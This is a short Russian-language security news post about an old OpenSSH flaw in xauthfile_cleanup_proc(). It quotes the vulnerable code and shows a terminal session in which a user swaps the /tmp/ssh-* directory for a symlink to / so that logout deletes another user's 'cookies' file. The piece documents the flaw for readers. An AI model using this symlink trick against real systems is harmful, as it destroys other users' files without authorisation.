Удаляем куки через OpenSSH

Рекомендуем почитать:

Xakep #305. Multi-Step SQLi

• Содержание выпуска
• Подписка на «Хакер»-60%

Уязвимость защиты в OpenSSH позволяет нападавшим удалять различные чужие файлы cookies, даже не зная пароль пользователя. Конечно это не серьёзная проблема, скорее всего баловство, но всё же
может кому-то это пригодится.

Уязвимые системы: 
OpenSSH version 2.3.0p1 (FreeBSD, RedHat)
OpenSSH version 2.5.2
OpenSSH version 2.5.2p2
OpenSSH version 2.9p1

Код находится в session.c in the xauthfile_cleanup_proc() function
<SNIP>
/*
 * Remove local Xauthority file.
 */
void
xauthfile_cleanup_proc(void *ignore)
{
debug("xauthfile_cleanup_proc called");
if (xauthfile != NULL) {
char *p;
unlink(xauthfile);
</SNIP>
Where xauthfile points to a buffer containing the name of the cookies file.

Эксплоит:
 # touch /cookies;ls /cookies
 /cookies
 # ssh zen@localhost
 zen@localhost's password:
 Last login: Mon Jun 4 20:22:39 2001 from localhost.local
 Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
 $ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
 $ logout
 Connection to localhost closed.
 # ls /cookies
 /bin/ls: /cookies: No such file or directory